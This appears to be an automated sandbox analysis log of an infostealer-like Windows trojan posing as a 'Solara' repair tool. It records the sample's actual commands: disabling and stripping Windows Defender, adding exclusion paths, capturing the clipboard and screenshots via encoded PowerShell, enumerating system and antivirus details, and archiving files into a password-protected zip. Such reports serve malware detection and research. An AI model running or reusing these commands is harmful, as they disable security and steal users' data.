Source: cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_sqlite3.pyd. vs cmd.exe
Source: cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ssl.pyd. vs cmd.exe
Source: cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs cmd.exe
Source: cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs cmd.exe
Source: cmd.exe, 00000001.00000002.2107385871.00007FFE130CC000.00000004.00000001.01000000.00000012.sdmp | Binary or memory string: OriginalFilename_queue.pyd. vs cmd.exe
Source: cmd.exe, 00000001.00000002.2107110070.00007FFE126F3000.00000004.00000001.01000000.00000006.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs cmd.exe
Source: cmd.exe, 00000001.00000002.2104939736.00007FFE0146E000.00000004.00000001.01000000.0000000B.sdmp | Binary or memory string: OriginalFilenamesqlite3.dll0 vs cmd.exe
Source: cmd.exe, 00000001.00000000.1702552927.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWPR.exen' vs cmd.exe
Source: cmd.exe, 00000001.00000002.2105244168.00007FFE0EB6D000.00000004.00000001.01000000.0000000E.sdmp | Binary or memory string: OriginalFilename_ssl.pyd. vs cmd.exe
Source: cmd.exe, 00000001.00000002.2104535149.00007FFDFB8A0000.00000004.00000001.01000000.00000004.sdmp | Binary or memory string: OriginalFilenamepython310.dll. vs cmd.exe
Source: cmd.exe, 00000001.00000002.2106592817.00007FFE11EEC000.00000004.00000001.01000000.00000008.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs cmd.exe
Source: cmd.exe, 00000001.00000002.2102050539.00007FFDFAFF7000.00000004.00000001.01000000.00000013.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs cmd.exe
Source: cmd.exe, 00000001.00000002.2103626383.00007FFDFB414000.00000004.00000001.01000000.0000000F.sdmp | Binary or memory string: OriginalFilenamelibcryptoH vs cmd.exe
Source: cmd.exe, 00000001.00000002.2102504128.00007FFDFB0B3000.00000004.00000001.01000000.00000010.sdmp | Binary or memory string: OriginalFilenamelibsslH vs cmd.exe
Source: cmd.exe, 00000001.00000002.2108506409.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs cmd.exe
Source: cmd.exe, 00000001.00000002.2106257882.00007FFE11EBE000.00000004.00000001.01000000.0000000A.sdmp | Binary or memory string: OriginalFilename_sqlite3.pyd. vs cmd.exe
Source: cmd.exe, 00000001.00000002.2105503765.00007FFE10313000.00000004.00000001.01000000.00000011.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs cmd.exe
Source: cmd.exe, 00000001.00000002.2107931730.00007FFE13348000.00000004.00000001.01000000.00000009.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs cmd.exe
Source: cmd.exe, 00000001.00000002.2107620418.00007FFE1330C000.00000004.00000001.01000000.0000000D.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs cmd.exe
Source: cmd.exe, 00000001.00000002.2105816102.00007FFE11528000.00000004.00000001.01000000.0000000C.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs cmd.exe
Source: cmd.exe | Binary or memory string: OriginalFilenameWPR.exen' vs cmd.exe
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Users\user\Desktop\cmd.exe | Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\cmd.exe | Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3615
Source: libcrypto-1_1.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
Source: libssl-1_1.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
Source: python310.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9989695677157001
Source: sqlite3.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9974986001493175
Source: unicodedata.pyd.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9949597928113553
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@135/56@2/3
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3FCAFC GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3FEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A42B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A403144 GetDiskFreeSpaceExW
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8704:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8788:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8648:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8864:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9160:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8412:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2936:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8616:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
Source: C:\Users\user\Desktop\cmd.exe | Mutant created: \Sessions\1\BaseNamedObjects\v
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8504:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Users\user\Desktop\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI72642
Source: cmd.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\cmd.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: cmd.exe | ReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\cmd.exe | File read: C:\Users\user\Desktop\cmd.exe
Source: unknown | Process created: C:\Users\user\Desktop\cmd.exe "C:\Users\user\Desktop\cmd.exe"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Users\user\Desktop\cmd.exe "C:\Users\user\Desktop\cmd.exe"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES74CA.tmp" "c:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
